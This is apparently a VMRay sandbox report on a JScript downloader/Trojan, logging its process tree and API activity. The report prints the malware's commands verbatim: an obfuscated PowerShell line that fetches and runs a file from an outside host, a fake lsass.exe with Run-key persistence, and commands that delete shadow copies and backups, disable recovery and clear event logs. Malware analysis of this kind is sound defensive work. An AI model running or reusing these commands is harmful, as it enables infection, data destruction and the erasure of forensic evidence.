4683ab92...66d3 | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader, Trojan

Remarks (2/2)

(0x200002e). Some of the analysis artifacts were not scanned by local AV due to an error. Check logs or contact support for further info.

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

Remarks

(0x200001f): Code in memory was overwritten during this analysis. Review corresponding VTI for more info.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa14 Analysis Target High (Elevated) cscript.exe "C:\Windows\System32\CScript.exe" "C:\Users\5P5NRG~1\Desktop\LDR_2886.js" -
#2 0xa54 Child Process High (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu #1
#3 0xa74 Child Process High (Elevated) powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png'); #2
#4 0xb38 Child Process High (Elevated) tempxee84.png C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png #2
#6 0x908 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /e:on /c md "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png" "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" & reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe\" *" #4
#7 0x73c Child Process High (Elevated) reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe\" *" #6
#8 0xc4 Child Process High (Elevated) lsass.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" * #4
#9 0x210 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png" & if not exist "C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png" exit ) #4
#10 0x184 Child Process High (Elevated) ping.exe ping -n 3 127.1 #9
#11 0x944 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures #8
#12 0x930 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no #8
#13 0x99c Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet #8
#14 0x9ec Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup #8
#15 0x9d4 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0 #8
#16 0x9c8 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete backup #8
#17 0x3d0 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete #8
#18 0xa18 Child Process High (Elevated) wmic.exe wmic shadowcopy delete #17
#19 0x36c RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #18
#21 0x8cc RPC Server System (Elevated) wmiprvse.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding #19
#22 0x8a8 RPC Server System (Elevated) vssvc.exe C:\Windows\system32\vssvc.exe #21
#23 0x878 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet #8
#24 0x860 Child Process High (Elevated) vssadmin.exe vssadmin delete shadows /all /quiet #23
#25 0x844 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f #8
#26 0x82c Child Process High (Elevated) reg.exe reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f #25
#27 0x824 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f #8
#28 0xb18 Child Process High (Elevated) reg.exe reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f #27
#29 0xa9c Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" #8
#30 0xb1c Child Process High (Elevated) reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" #29
#31 0xa98 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h #8
#32 0x33c Child Process High (Elevated) attrib.exe attrib "C:\Users\5p5NrGJn0jS HALPmcxz\documents\Default.rdp" -s -h #31
#33 0x9b4 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp" #8
#34 0xa84 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application #8
#35 0xb2c Child Process High (Elevated) wevtutil.exe wevtutil.exe clear-log Application #34
#36 0xa78 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security #8
#37 0xbec Child Process High (Elevated) wevtutil.exe wevtutil.exe clear-log Security #36
#38 0xb64 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System #8
#39 0xb8c Child Process High (Elevated) wevtutil.exe wevtutil.exe clear-log System #38
#40 0xb70 Child Process High (Elevated) cmd.exe "C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled #8
#41 0x5c8 Child Process High (Elevated) sc.exe sc config eventlog start=disabled #40
#45 0x530 Autostart Medium lsass.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" * -

Behavior Information - Grouped by Category

Process #1: cscript.exe
190 0
»
Information Value
ID #1
File Name c:\windows\system32\cscript.exe
Command Line "C:\Windows\System32\CScript.exe" "C:\Users\5P5NRG~1\Desktop\LDR_2886.js"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:00:36, Reason: Self Terminated
Monitor Duration 00:00:10
OS Process Information
»
Information Value
PID 0xa14
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A18
0x A2C
0x A30
0x A34
0x A38
0x A3C
0x A40
0x A44
0x A48
0x A50
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create shell.applicatiOn IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (6)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\Desktop\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\5P5NRG~1\Desktop\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\5P5NRG~1\Desktop\LDR_2886.js type = size True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Read C:\Users\5P5NRG~1\Desktop\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 108 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 96, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 96, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 96, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 96, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create cmd.exe show_window = 2666720 True 1
Fn
Module (28)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76e30000 True 2
Fn
Load ADVAPI32.dll base_address = 0x7fefdbf0000 True 1
Fn
Load ole32.dll base_address = 0x7fefe2b0000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefdbf0000 True 1
Fn
Get Handle c:\windows\system32\cscript.exe base_address = 0xff370000 True 2
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefe2b0000 True 2
Fn
Get Filename c:\windows\system32\cscript.exe process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x76e46d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x76e4c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x76f6f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefdc0b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefdc0c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefdc10710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefe2cc920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefe2d7490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefdc0e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefdc0f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefdc0f660 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7fefe2ca4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7fefe2e2e18 True 1
Fn
Get Address c:\windows\system32\cscript.exe function = 1, address_out = 0xff371a60 True 1
Fn
Create Mapping C:\Users\5P5NRG~1\Desktop\LDR_2886.js filename = C:\Users\5P5NRG~1\Desktop\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\5P5NRG~1\Desktop\LDR_2886.js process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 7166224 True 1
Fn
System (78)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:45:35 (UTC) True 4
Fn
Get Time type = Ticks, time = 99372 True 1
Fn
Get Time type = Performance Ctr, time = 14913676331 True 1
Fn
Get Time type = Ticks, time = 99653 True 1
Fn
Get Time type = Performance Ctr, time = 15050341123 True 1
Fn
Get Time type = Ticks, time = 99669 True 2
Fn
Get Time type = Ticks, time = 99918 True 1
Fn
Get Time type = Performance Ctr, time = 15366393986 True 1
Fn
Get Time type = Ticks, time = 99949 True 1
Fn
Get Time type = Performance Ctr, time = 15380128746 True 1
Fn
Get Time type = Ticks, time = 100059 True 1
Fn
Get Time type = Ticks, time = 100074 True 2
Fn
Get Time type = Ticks, time = 100105 True 12
Fn
Get Time type = Ticks, time = 100121 True 3
Fn
Get Time type = Ticks, time = 100137 True 10
Fn
Get Time type = Ticks, time = 100152 True 6
Fn
Get Time type = Ticks, time = 100168 True 5
Fn
Get Time type = Ticks, time = 100183 True 4
Fn
Get Time type = Ticks, time = 100199 True 1
Fn
Get Time type = Ticks, time = 100215 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:45:36 (UTC) True 1
Fn
Get Time type = Ticks, time = 100308 True 2
Fn
Get Time type = Performance Ctr, time = 15456140804 True 1
Fn
Get Time type = Ticks, time = 100324 True 3
Fn
Get Info type = Operating System True 6
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #2: cmd.exe
85 0
»
Information Value
ID #2
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:35, Reason: Child Process
Unmonitor End Time: 00:01:15, Reason: Self Terminated
Monitor Duration 00:00:40
OS Process Information
»
Information Value
PID 0xa54
Parent PID 0xa14 (c:\windows\system32\cscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A58
Host Behavior
File (21)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 2
Fn
Get Info PowErshelL.eXe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 6
Fn
Write STD_ERROR_HANDLE size = 106 True 2
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xa74, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png os_pid = 0xb38, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0e0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x76e30000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x76e46d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x76e423d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x76e38290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76e417e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:45:36 (UTC) True 1
Fn
Get Time type = Ticks, time = 100932 True 1
Fn
Get Time type = Performance Ctr, time = 15572803237 True 1
Fn
Environment (32)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 10
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 4
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 5
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
Set Environment String name = =ExitCode, value = 00000000 True 2
Fn
Set Environment String name = =ExitCodeAscii True 2
Fn
Process #3: powershell.exe
819 3
»
Information Value
ID #3
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:35, Reason: Child Process
Unmonitor End Time: 00:00:50, Reason: Self Terminated
Monitor Duration 00:00:14
OS Process Information
»
Information Value
PID 0xa74
Parent PID 0xa54 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A78
0x A7C
0x A80
0x A84
0x A88
0x A8C
0x A90
0x B20
0x B24
0x B28
0x B2C
0x B30
Downloaded Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png 284.00 KB MD5: 6c5950534d6c12899d81aba98826e4a4
SHA1: cc40ce4348ca01bb704c4872485c6f2351dbb72d
SHA256: 76daccd52aa8dd99c976ab8f4be508fdbafecf58d612ae0179b0fa3802721a9d
SSDeep: 6144:6h3+b9449fllCuQR7kVn+8QEfMiZ0X2T:6By944lllrQRkn+W7
False
Host Behavior
File (311)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\TempxeE84.png desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
